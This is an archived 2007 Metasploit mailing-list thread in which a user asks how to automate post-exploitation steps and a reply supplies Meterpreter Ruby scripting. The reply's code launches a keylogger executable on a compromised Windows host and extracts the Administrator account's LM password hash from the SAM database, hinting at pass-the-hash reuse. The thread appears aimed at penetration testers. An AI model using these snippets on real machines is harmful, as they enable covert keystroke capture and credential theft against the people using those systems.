Metasploit mailing list archives
Meterpreter AutoExec?
From: jerome.athias at free.fr (Jerome Athias)
Date: Sat, 10 Nov 2007 14:57:57 +0100
Hi, the design of the Meterpreter let you do this sort of things in an easy way: the meterpreter scripts! (thanks to The Alien ;-p) look at /scripts/meterpreter/ you'll find the needed migrate.rb script then, to launch a new process you'll use something like: myproc = client.sys.process.execute("C:\\keylog.exe", "/S") continue = false while (continue == false) sleep 5 pid_list = client.sys.process.processes().collect { |x| x["pid"] } if (pid_list.include?(myproc.pid) == false) continue = true end end print_status("Keylog installed") to dump the LM hash of the Administrator account, use: client.core.use("priv") max = client.priv.sam_hashes.length - 1 for i in 0..max if client.priv.sam_hashes[i].user_id == "500" adm_name= client.priv.sam_hashes[i].user_name adm_lanman = client.priv.sam_hashes[i].lanman end end print_status("LM hash for " + adm_name +" is "+ adm_lanman) # pass-the-hash anyone? Then, ... just be creative & innovative! My 2 euro cents /JA www.securinfos.info Best regards to VV & the folks of MISC (don't forget about my website guys ;-)) CybyDude a ?crit :
Hi List! Does Meterpreter support some sorta AutoExec script that can be executed post exploitation? I understand this sort of thing'd be possible through Ruby Scripts using MSF/Meterpreter API. But does MSF specifically look for something like autoexec (like AUTOEXEC.BAT in good old DOS)? Basically, I'm interested in automating post exploitation measures for client side attacks, which may include: 1-Migration of Process to something safe before user terminates IE/OE/FF 2-Dump Hashes 3-Upload, deploy & init custom stuff like a key logger 4-Dash off a mail to the pentester about the vulnerable machine. Could some one pls guide me in this regard? Regards n' Best Wishes CybyDude
-------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/x-pkcs7-signature Size: 3253 bytes Desc: S/MIME Cryptographic Signature URL: <http://mail.metasploit.com/pipermail/framework/attachments/20071110/b15bffad/attachment.bin>
Current thread:
- Meterpreter AutoExec? CybyDude (Nov 10)
- Meterpreter AutoExec? Jerome Athias (Nov 10)